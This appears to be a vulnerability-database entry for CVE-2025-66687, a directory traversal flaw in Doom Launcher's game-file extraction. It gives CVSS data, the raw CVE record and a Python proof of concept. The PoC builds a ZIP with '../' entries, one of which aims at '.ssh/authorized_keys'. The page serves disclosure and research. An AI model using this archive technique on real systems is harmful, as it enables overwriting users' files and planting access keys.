Security Vulnerability Report
中文
CVE-2025-66687 CVSS 7.5 HIGH

CVE-2025-66687

Published: 2026-03-16 18:16:05
Last Modified: 2026-04-27 19:18:47
Source: [email protected]

Description

Doom Launcher 3.8.1.0 is vulnerable to Directory Traversal due to missing file path validation during the extraction of game files

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Doom Launcher 3.8.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66687 PoC - Doom Launcher Directory Traversal This PoC generates a malicious ZIP file that exploits the path traversal vulnerability during game file extraction in Doom Launcher 3.8.1.0 """ import zipfile import os import sys def create_malicious_zip(output_path): """ Create a malicious ZIP file with path traversal payloads """ # Path traversal payload to write file outside target directory malicious_filenames = [ "../../../test.txt", # Basic traversal to write in parent directories "../config_backup.ini", # Overwrite config in parent directory "../../../.ssh/authorized_keys", # Attempt to write SSH keys (if .ssh exists) "startup.txt" # Normal file in target directory ] malicious_content = b"This file was created via CVE-2025-66687 Directory Traversal exploit" with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as zipf: for filename in malicious_filenames: zipf.writestr(filename, malicious_content) print(f"[+] Added malicious entry: {filename}") print(f"[+] Malicious ZIP file created: {output_path}") print("[*] When extracted by vulnerable Doom Launcher, files will be written outside target directory") def verify_zip_content(zip_path): """Verify the contents of the created ZIP file""" print("\n[*] ZIP file contents:") with zipfile.ZipFile(zip_path, 'r') as zipf: for info in zipf.infolist(): print(f" - {info.filename}") if __name__ == "__main__": if len(sys.argv) > 1: output_file = sys.argv[1] else: output_file = "exploit_cve_2025_66687.zip" create_malicious_zip(output_file) verify_zip_content(output_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66687", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:04.657", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Doom Launcher 3.8.1.0 is vulnerable to Directory Traversal due to missing file path validation during the extraction of game files"}, {"lang": "es", "value": "Doom Launcher 3.8.1.0 es vulnerable a salto de directorio debido a la falta de validación de la ruta de archivo durante la extracción de archivos de juego."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/nstlaurent/DoomLauncher/issues/369", "source": "[email protected]"}, {"url": "https://jeroscope.com/advisories/2025/jero-2025-014/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.